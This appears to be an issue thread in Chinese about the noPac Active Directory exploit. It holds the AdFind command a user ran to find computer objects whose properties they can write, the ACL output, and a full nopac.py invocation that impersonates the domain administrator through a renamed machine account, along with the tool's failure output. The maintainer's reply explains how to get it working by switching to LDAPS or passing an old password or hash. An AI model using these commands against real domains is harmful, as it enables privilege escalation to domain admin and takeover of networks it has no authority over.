maq=0 Method 1 test failed

[ki11y0u]

在08，12域控上测试，查找具备修改的用户，测试失败：

C:\Users\Administrator\Desktop>AdFind.exe -b "CN=Computers,DC=xxx,DC=com" -sc g
etacls -sddlfilter ;;"[WRT PROP]";;computer;xxx\test -recmute

AdFind V01.52.00cpp Joe Richards (support@joeware.net) January 2020

Using server: AD.xxx.com:389
Directory: Windows Server 2012 R2

dn:CN=win7,CN=Computers,DC=xxx,DC=com

nTSecurityDescriptor: [DACL] OBJ ALLOW;;[WRT PROP];Logon Information;computer;B
OSS\test
nTSecurityDescriptor: [DACL] OBJ ALLOW;;[WRT PROP];description;computer;xxx\te
st
nTSecurityDescriptor: [DACL] OBJ ALLOW;;[WRT PROP];displayName;computer;xxx\te
st
nTSecurityDescriptor: [DACL] OBJ ALLOW;;[WRT PROP];sAMAccountName;computer;xxx
\test

python.exe nopac.py xxx.com/test:Admin123 -dc-ip 192.168.xxx.xxx -dc-host ad.xxx.com --impersonate administrator -no-add -new-name win7$ -use-ldap

[] Current ms-DS-MachineAccountQuota = 0
[] win7$ already exists! Using force mode.
{'attributes': {'ms-DS-MachineAccountQuota': [], 'objectSid': ['S-1-5-21-722558688-90111164-1262859035-2608']}, 'dn': 'CN=win7,CN=Computers,DC=xxx,DC=com'} {'result': 53, 'description': 'unwillingToPerform', 'dn': '', 'message': '0000001F: SvcErr: DSID-031A12D2, problem 5003 (WILL_NOT_PERFORM), data 0\n\x00', 'referrals': None, 'type': 'modifyResponse'}
[-] Cannot change the machine password , exit.

计算机用户、域用户 需要做特别的设置？

[Ridter]

修改密码需要使用ldaps连接，更新了一下代码，如果你已知win7的密码，可以通过-old-pass或-old-hash来指定，这样就可以通过ldap来使用，如果未知，请去除-user-ldap 来使用ldaps。